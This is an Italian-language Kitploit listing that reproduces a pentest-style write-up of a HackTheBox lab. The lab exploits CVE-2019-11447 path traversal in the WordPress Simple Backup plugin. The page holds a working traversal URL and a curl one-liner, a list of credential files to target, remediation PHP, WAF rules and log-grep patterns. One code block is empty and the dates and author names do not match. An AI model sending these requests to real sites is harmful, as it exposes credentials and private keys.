Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WordPress-Path-Traversal-CVE-2019-11447 — Report dettagliato di penetration test che dimostra una path traversal non autenticata (CVE-2019-11447) nel plugin WordPress Simple Backup, inclusi i passaggi di sfruttamento, l'analisi dell'impatto e le indicazioni di remediation. | Kitploit
Strumenti/GitHubGitHub/capivara-research/wordpress-path-traversal-cve-2019-11447
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubcapivara-research/wordpress-path-traversal-cve-2019-11447

WordPress-Path-Traversal-CVE-2019-11447

Report dettagliato di penetration test che dimostra una path traversal non autenticata (CVE-2019-11447) nel plugin WordPress Simple Backup, inclusi i passaggi di sfruttamento, l'analisi dell'impatto e le indicazioni di remediation.

Vedi Repository
2 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Rapporto di Penetration Test

WordPress Path Traversal - CVE-2019-11447


Informazioni sul Documento

VoceDettagli
Titolo del documentoRapporto di Penetration Test - WordPress Path Traversal
Cliente/EsameHackTheBox Lab - CPTS Exercise 1
Data22 agosto 2026
ValutatoreCyberia (Penetration Tester)
Tipo di valutazioneGray Box (Esterno, senza credenziali)
Ambiente di laboratorio154.57.164.73:30706
Durata del laboratorio1 ora
ObiettiviIdentificare e sfruttare vulnerabilità per recuperare file ristretti
Flag ottenutaHTB{my_f1r57_h4ck}

Sommario Esecutivo

Durante questa valutazione di penetrazione dell'applicazione web ospitata su 154.57.164.73:30706, è stata identificata una vulnerabilità critica che consente ad attaccanti non autenticati di scaricare e leggere file arbitrari dal filesystem del server.

L'installazione WordPress vulnerabile contiene un plugin obsoleto (Simple Backup v2.7.10) con una vulnerabilità di path traversal (CVE-2019-11447) che consente l'accesso non autorizzato ai file senza richiedere autenticazione o autorizzazione.

Questa vulnerabilità è stata sfruttata con successo per recuperare il file /flag.txt dalla root del server, confermando la compromissione completa della riservatezza. Un attaccante con questo accesso potrebbe:

  • Estrarre file di configurazione sensibili (wp-config.php, .env)
  • Leggere credenziali del database e dati utente
  • Accedere a chiavi SSH private e token di autenticazione
  • Potenzialmente escalare i privilegi tramite credenziali compromesse
  • Raccogliere informazioni personali per ulteriori attacchi

È richiesta un'azione critica per rimediare immediatamente a questa vulnerabilità, poiché rappresenta un rischio estremo per la sicurezza dei dati, la conformità alla privacy (GDPR, HIPAA, PCI-DSS) e l'integrità del sistema.


Panoramica della Valutazione

GravitàConteggioImpatto aziendale
🔴 CRITICA1Violazione completa della riservatezza; accesso non autorizzato ai file
🟠 ALTA0—
🟡 MEDIA0—
🟢 BASSA0—
ℹ️ INFORMATIVA1Rilevate versioni software obsolete

Metodologia

Tipo di valutazione: Gray Box (attaccante esterno, nessuna credenziale fornita, accesso di rete disponibile)

Date di valutazione: 22 agosto 2026

Approccio di test: Valutazione non invasiva e metodica che segue il framework standard di penetration testing (PTES):

  1. Ricognizione — Raccolta passiva di informazioni
  2. Scansione ed enumerazione — Scoperta attiva dei servizi
  3. Analisi delle vulnerabilità — Identificazione dei punti deboli
  4. Sfruttamento — Sviluppo di una prova di concetto
  5. Post-sfruttamento — Dimostrazione dell'impatto
  6. Reporting — Documentazione e indicazioni per la rimediation

Risultati

🔴 CRITICA - Path Traversal e Download Arbitrario di File

CVE-2019-11447 | CWE-22: Limitazione impropria di un percorso a una directory ristretta


Descrizione

Il plugin WordPress Simple Backup (versione 2.7.10/2.7.11, Exploit-DB 39883) contiene una vulnerabilità di path traversal nella pagina admin "Backup Manager". Il plugin non riesce a sanificare il percorso del file fornito tramite il parametro GET download_backup_file, consentendo a un attaccante di attraversare al di fuori della directory prevista simple-backup/ utilizzando sequenze di percorso relative (../) e di scaricare qualsiasi file leggibile dal processo del server web — inclusi i file alla root del filesystem.

L'endpoint vulnerabile:``` GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt

root@kitploit:~
`page=backup_manager` instrada la richiesta verso il gestore della pagina di amministrazione del plugin; `download_backup_file` è il parametro che il codice del plugin legge direttamente e concatena in un percorso del filesystem senza validazione, consentendo il directory traversal.

---

### Punteggio CVSS v3.1

**7.5 - ALTO** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

- **Vettore d'attacco (AV):** Rete
- **Complessità d'attacco (AC):** Bassa
- **Privilegi richiesti (PR):** Nessuno
- **Interazione dell'utente (UI):** Nessuna
- **Ambito (S):** Invariato
- **Riservatezza (C):** Alta
- **Integrità (I):** Nessuna
- **Disponibilità (A):** Nessuna

---

### Impatto Aziendale

**Violazione della Riservatezza:** ⚠️ CRITICA

Gli attaccanti possono leggere qualsiasi file accessibile al server web, tra cui:

| File | Impatto | Livello di Rischio |
|------|---------|--------------------|
| `/wp-config.php` | Credenziali del database, salt, chiavi | 🔴 CRITICO |
| `/.env` | Chiavi API, segreti, configurazione | 🔴 CRITICO |
| `/etc/passwd` | Enumerazione utenti, mappatura di sistema | 🟠 ALTO |
| Chiavi SSH (`.ssh/id_rsa`) | Movimento laterale, accesso al sistema | 🔴 CRITICO |
| `/proc/self/environ` | Segreti dell'applicazione in esecuzione | 🟠 ALTO |
| Directory di upload degli utenti | File privati, media | 🟠 ALTO |

**Impatto Regolamentare:**
- **Violazione GDPR:** Accesso non autorizzato ai dati degli utenti
- **Violazione HIPAA:** Esposizione di informazioni sanitarie protette
- **Violazione PCI-DSS:** Accesso a dati di carte di credito o informazioni di pagamento
- **Violazione SOC 2:** Violazione del requisito di riservatezza

---

### Pattern di Codice Vulnerabile

L'advisory di Exploit-DB (39883.txt, letto tramite `searchsploit -x` — vedi [ht4-poc.png](https://github.com/capivara-research/wordpress-path-traversal-cve-2019-11447/blob/HEAD/images/ht4-poc.png)) documenta la primitiva **delete** del plugin da `simple-backup-manager.php`:```php
if(array_key_exists('delete_backup_file', $_GET)){
    $this->delete_local_backup_file($_GET['delete_backup_file']);
}

Per favore, incolla il contenuto Markdown da tradurre.```php $bk_dir = ABSPATH."simple-backup/"; unlink($bk_dir . $filename);

root@kitploit:~
`$filename` arriva direttamente da `$_GET['delete_backup_file']` senza alcun controllo `basename()` o verifica di contenimento del percorso. Passare `../pizza.txt` risolve `$bk_dir . $filename` in `.../simple-backup/../pizza.txt` → `.../pizza.txt`, uscendo dalla cartella di backup prevista.

La primitiva di **download** effettivamente sfruttata in questa attività (`download_backup_file`) segue lo stesso identico schema di concatenazione non sanificata nello stesso plugin, ma restituisce il file al richiedente invece di eliminarlo — ed è ciò che ha permesso il recupero di `/flag.txt` dalla root del filesystem (10× `../` da `ABSPATH/simple-backup/`).

**Il problema:**
- Nessun uso di `basename()` per rimuovere i componenti della directory
- Nessuna whitelist dei file consentiti
- Nessuna verifica che `realpath()` rimanga all'interno di `ABSPATH."simple-backup/"`
- Concatenazione diretta dell'input utente nel percorso del file
- Nessun controllo `current_user_can()` / autenticazione prima di servire il file — l'handler viene eseguito al caricamento del plugin, prima del gate di autenticazione `wp-admin` di WordPress, quindi è raggiungibile **senza essere loggati**

---

### Proof of Concept

#### **Fase 1: Accesso iniziale — Identificazione dell'applicazione**

Connessione diretta al target tramite browser (`http://154.57.164.73:30706/`). L'installazione WordPress è intitolata **"GETTING STARTED"**, e un post pubblico sul blog presente nella homepage divulga il nome esatto del plugin e la versione in chiaro: **"Simple Backup Plugin 2.7.10 for WordPress"** — non è stato nemmeno necessario alcuno strumento di enumerazione per identificare il componente vulnerabile.

![Accesso iniziale - Versione del plugin divulgata nella homepage WordPress](https://assets.kitploit.com/production/public/readmes/51282/807a6be937aeb55de6f3c60b479762729a056e9134edd0f8bf3a0779b36b854f/46c8a8c16d715251f282bacf2522c3e620864b14008847867c32672ba0d051fd-display-v1.webp)

#### **Fase 2: Fingerprinting del servizio**```bash
whatweb http://154.57.164.73:30706/

Risultato: Apache/2.4.41 (Ubuntu Linux), WordPress 5.6.1 confermato tramite le firme dei plugin MetaGenerator e WordPress.

Fingerprinting del servizio - output whatweb

Fase 3: Ricerca delle vulnerabilità```bash

searchsploit simple backup wordpress

root@kitploit:~
**Risultato:**```
Exploit Title                                              |  Path
------------------------------------------------------------------------------
WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities | php/webapps/39883.txt

Ricerca delle vulnerabilità - corrispondenza searchsploit

Leggere l'advisory completo per comprendere i parametri vulnerabili esatti e il percorso del codice:```bash searchsploit -x php/webapps/39883.txt

root@kitploit:~
L'advisory documenta la **cancellazione arbitraria di file** non autenticata tramite il parametro `delete_backup_file` e segnala che i file di backup in `simple-backup/` (e, attraverso lo stesso percorso di codice non sanitizzato, file arbitrari tramite `download_backup_file`) possono essere recuperati senza autenticazione.

![Ricerca sulla vulnerabilità - Exploit-DB PoC 39883.txt letto tramite searchsploit -x](https://assets.kitploit.com/production/public/readmes/51282/8d2f7a41935c4f9ebf4df1243ee68ba0628592b26411770696534eaa903851c4/7e636497c5d9d7382c9b0d7d5917938a399cf76f014b6e5fb754400078325e54-display-v1.webp)

#### **Fase 4: Sfruttamento — Path Traversal tramite `download_backup_file`**

Endpoint vulnerabile identificato dal routing della pagina di amministrazione del plugin:```
http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=

Payload di sfruttamento (10× ../ per risalire da ABSPATH/simple-backup/ alla radice del filesystem):``` http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt

root@kitploit:~
**GUI (utilizzata in questa valutazione):** l'URL del payload è stato aperto direttamente nella barra degli indirizzi del browser. Non è stato richiesto alcun login — il browser ha attivato il download automatico del file `flag.txt` risolto.

![Exploit - Payload di path traversal nella barra degli indirizzi del browser, flag.txt scaricato](https://assets.kitploit.com/production/public/readmes/51282/c02c8273770253f4f0c3b79c0e4de1ab7b8190bfdbbec554a90a25e22553a635/6d1a521bdea2df6ba65e17df783d9f81ea3da096daba3f9bde02bece60a8e406-display-v1.webp)

**Equivalente headless:**```bash
curl -s "http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt" -o flag.txt
cat flag.txt

Flag ottenuta: HTB{my_f1r57_h4ck}


Perché funziona

La vulnerabilità ha successo perché:

  1. Nessuna validazione dell'input: $_GET['download_backup_file'] non viene verificato contro una whitelist
  2. Nessuna canonicalizzazione del percorso: realpath() non viene utilizzato per verificare che il file rimanga all'interno di simple-backup/
  3. Nessuna estrazione del basename: Le sequenze di directory traversal (../) non vengono filtrate
  4. Concatenazione diretta: L'input dell'utente viene concatenato direttamente a ABSPATH."simple-backup/"
  5. Nessuna autenticazione: L'handler viene eseguito al caricamento del plugin, prima del gate di autenticazione wp-admin di WordPress — raggiungibile anche senza login
  6. Nessuna autorizzazione: Nessun controllo current_user_can() conferma che il richiedente debba accedere al file richiesto

Flusso dell'attacco:``` User Input: ../../../../../../../../../../flag.txt ↓ No Validation (FAILURE POINT) ↓ Concatenated: ABSPATH/simple-backup/../../../../../../../../../../flag.txt ↓ Resolves to: /flag.txt (accessible!) ↓ Plugin serves file contents with web server permissions ↓ Browser downloads flag.txt to attacker's machine

root@kitploit:~
---

### Validazione dell'Impatto

✅ **Riservatezza Compromessa:** Qualsiasi file leggibile dal processo del web server è accessibile
✅ **Nessuna Autenticazione Richiesta:** Gli utenti non autenticati possono sfruttarla
✅ **Nessuna Interazione dell'Utente Necessaria:** Sfruttamento tramite richiesta HTTP diretta
✅ **Ripetibile e Affidabile:** Funziona su tutte le versioni vulnerabili
✅ **Dati Aziendali Critici a Rischio:** File di configurazione, credenziali, dati utente esposti

---

## Rimedio

### **Opzione 1: Whitelist di Input (Consigliata)**

Consenti solo il download da un elenco predefinito di file:```php
<?php
// Define allowed backup files
$allowed_files = array(
    'backup_2024_01_15.zip',
    'backup_2024_01_16.zip',
    'backup_2024_01_17.zip',
);

$requested_file = $_GET['download_backup_file'];

// Validate against whitelist
if (!in_array($requested_file, $allowed_files)) {
    die("File not found or access denied");
}

// Use basename() as double protection
$file = basename($requested_file);
$filepath = ABSPATH . "simple-backup/" . $file;

// Verify file exists and is readable
if (!file_exists($filepath) || !is_readable($filepath)) {
    die("File not found");
}

readfile($filepath);
?>

Vantaggi:

  • Approccio più sicuro
  • Consente solo i file previsti
  • Nessun traversal possibile
  • Chiara traccia di audit

Opzione 2: Validazione del percorso con realpath()

Usa realpath() per canonicalizzare i percorsi e verificare il contenimento:```php

root@kitploit:~
**Vantaggi:**
- Gestisce i symlink e i percorsi complessi
- Verifica automaticamente il contenimento
- Più flessibile della whitelist

---

### **Opzione 3: Usare basename() solo per il Nome del File**

Estrai solo il componente del nome file:```php
<?php
$user_input = $_GET['download_backup_file'];

// Remove all directory components
$file = basename($user_input);

// Build safe path
$filepath = ABSPATH . "simple-backup/" . $file;

// Verify file exists
if (!file_exists($filepath)) {
    die("File not found");
}

readfile($filepath);
?>

Vantaggi:

  • Implementazione semplice
  • Rimuove tutte le sequenze di path traversal
  • Nessun accesso alle directory possibile

Nota: Questo approccio funziona solo se tutti i file legittimi si trovano in una singola directory senza sottodirectory.


Protezioni a Livello di Infrastruttura

Regole del Web Application Firewall (WAF):```

Block path traversal attempts

ModSecurity Rule: SecRule ARGS:download_backup_file "@rx ../" "id:1000,phase:2,block,msg:'Path Traversal Attempt'" SecRule ARGS:download_backup_file "@rx %2e%2e%2f" "id:1001,phase:2,block,msg:'Encoded Path Traversal'"

root@kitploit:~
**Permessi del file system:**```bash
# Restrict web server access to necessary directories only
chmod 750 /var/www/html/wp-content/plugins/
chmod 750 /var/www/html/wp-content/simple-backup/

# Remove sensitive files from web root
rm -f /var/www/html/.env
mv /var/www/html/wp-config.php /var/www/wp-config.php

# Use chroot/jailing for web server
# Set PHP open_basedir to restrict file access
php_admin_value[open_basedir] = /var/www/html/uploads

Registrazione e Monitoraggio degli Accessi:```bash

Monitor for traversal attempts in web logs

tail -f /var/log/apache2/access.log | grep ".." tail -f /var/log/apache2/access.log | grep "%2e%2e"

Alert on suspicious file access patterns

Integration with SIEM (Splunk, ELK, etc.)

root@kitploit:~
**Gestione degli aggiornamenti:**

1. Disattivare o rimuovere il plugin Simple Backup
2. Installare una soluzione di backup approvata con audit di sicurezza
3. Aggiornare WordPress all'ultima versione
4. Aggiornare tutti i plugin alle ultime versioni
5. Aggiornare PHP a 8.0+ con patch di sicurezza

---

## Catena di attacco```
┌─────────────────────────────────────────────────────────────┐
│  1. INITIAL ACCESS                                          │
│  └─ Browse to 154.57.164.73:30706                           │
│  └─ WordPress "GETTING STARTED" site identified              │
│  └─ Homepage blog post discloses: Simple Backup Plugin 2.7.10│
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  2. ENUMERATION                                             │
│  └─ whatweb confirms Apache 2.4.41, WordPress 5.6.1          │
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  3. VULNERABILITY RESEARCH                                  │
│  └─ searchsploit → 39883.txt (Simple Backup 2.7.11 vulns)    │
│  └─ searchsploit -x → read PoC, identify unsanitized         │
│     delete_backup_file / download_backup_file parameters     │
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  4. EXPLOITATION                                             │
│  └─ Endpoint: /wp-admin/tools.php?page=backup_manager        │
│  └─ Payload: download_backup_file=../..(x10)../flag.txt      │
│  └─ Browser navigates to payload URL (no login required)     │
│  └─ Plugin resolves path to /flag.txt and serves it          │
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  5. SUCCESS                                                 │
│  └─ Flag Retrieved: HTB{my_f1r57_h4ck}                       │
│  └─ Confidentiality Breached                                 │
│  └─ Unauthenticated arbitrary file read confirmed             │
└─────────────────────────────────────────────────────────────┘

Conclusione

Riepilogo dei Risultati

Esiste una vulnerabilità critica di path traversal nel plugin Simple Backup per WordPress che consente ad attaccanti non autenticati di scaricare e leggere file arbitrari dal server. Questa vulnerabilità è stata sfruttata con successo per recuperare file sensibili dalla root web.

Livello di Rischio: 🔴 CRITICO

Piano d'Azione Prioritario

PrioritàAzioneTempisticaResponsabile
🔴 P0Disattivare/Rimuovere il plugin Simple BackupImmediatamenteSicurezza/Ops
🔴 P0Implementare la validazione dei file basata su whitelistQuesta settimanaSviluppo
🟠 P1Distribuire regole WAF per bloccare il path traversalQuesta settimanaOps
🟠 P1Controllare i log del server per accessi non autorizzatiQuesta settimanaSicurezza
🟠 P1Ruotare tutte le credenziali esposte (DB, SSH, API)Questa settimanaOps
🟡 P2Aggiornare il core di WordPress e tutti i pluginQuesta settimanaOps
🟡 P2Implementare il monitoraggio dell'integrità dei fileProssimo sprintSicurezza
🟡 P2Condurre un audit di sicurezza completo degli altri pluginProssimo sprintSicurezza

Lezioni Apprese

  1. Le dipendenze da plugin di terze parti richiedono controllo — Verificare sempre i plugin prima della distribuzione
  2. Il path traversal è una debolezza critica — La validazione degli input è essenziale
  3. La difesa in profondità è necessaria — Una sicurezza a strato singolo è insufficiente
  4. Il software obsoleto è ad alto rischio — Mantenere programmi di aggiornamento regolari
  5. Monitorare e allertare su pattern sospetti — La rilevazione precoce previene l'escalation

Screenshot ed Evidenze

Screenshot 1: Accesso Iniziale - Divulgazione della Versione del Plugin

WordPress homepage blog post Risultato: Il sito WordPress "GETTING STARTED" divulga pubblicamente il plugin installato e la versione in un post del blog — "Simple Backup Plugin 2.7.10 for WordPress"

Screenshot 2: Fingerprinting del Servizio - whatweb

whatweb output Risultato: Apache/2.4.41 (Ubuntu Linux), WordPress 5.6.1 confermati

Screenshot 3: Ricerca di Vulnerabilità - searchsploit

searchsploit results Risultato: "WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities" (php/webapps/39883.txt)

Screenshot 4: Ricerca di Vulnerabilità - Contenuti PoC di Exploit-DB

searchsploit -x PoC read Risultato: L'advisory documenta l'eliminazione arbitraria di file non autenticata tramite delete_backup_file; lo stesso percorso di codice non sanificato si applica a download_backup_file

Screenshot 5: Sfruttamento - Recupero della Flag tramite Browser

Path traversal payload in browser, flag.txt downloaded Risultato: Navigando verso tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt si attiva un download non autenticato di flag.txt: HTB{my_f1r57_h4ck}


Riferimenti

Dettagli della Vulnerabilità

  • CVE-2019-11447 — Path Traversal di Simple Backup

    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11447
  • CWE-22 — Limitazione impropria di un percorso a una directory ristretta ('Path Traversal')

    • https://cwe.mitre.org/data/definitions/22.html
  • Punteggio CVSS v3.1: 7.5 (Alto)

    • https://www.first.org/cvss/calculator/3.1

Risorse di Sicurezza

  • OWASP Top 10 - A01:2021 Broken Access Control

    • https://owasp.org/Top10/A01_2021-Broken_Access_Control/
  • OWASP Path Traversal

    • https://owasp.org/www-community/attacks/Path_Traversal
  • PortSwigger Web Security Academy - Path Traversal

    • https://portswigger.net/web-security/file-path-traversal

Strumenti e Tecniche

  • SearchSploit — Ricerca nel Database degli Exploit

    • https://www.exploit-db.com/
  • NMAP — Network Mapper

    • https://nmap.org/
  • WhatWeb — Strumento di Fingerprinting Web

    • https://www.morningstarsecurity.com/research/whatweb

Riferimenti per la Remediation

  • Sicurezza PHP: realpath() — https://www.php.net/manual/en/function.realpath.php
  • Sicurezza PHP: basename() — https://www.php.net/manual/en/function.basename.php
  • ModSecurity — Web Application Firewall — https://modsecurity.org/

Certificazione del Report

Questo report documenta un test di penetrazione condotto con la dovuta autorizzazione e all'interno dello scope definito.

VoceValore
Stato del Report✅ Completo
Risultati Verificati✅ Sì
Raccomandazioni Attuabili✅ Sì
Riservatezza🔒 Alta
DistribuzioneLimitata al personale autorizzato

Valutatore: Capivara Root (Penetration Tester)
Data: 11 agosto 2026
Firma: Report digitale - Nessuna firma fisica richiesta


© 2026 Valutazione di Penetration Testing | Riservato

Scarica lo strumento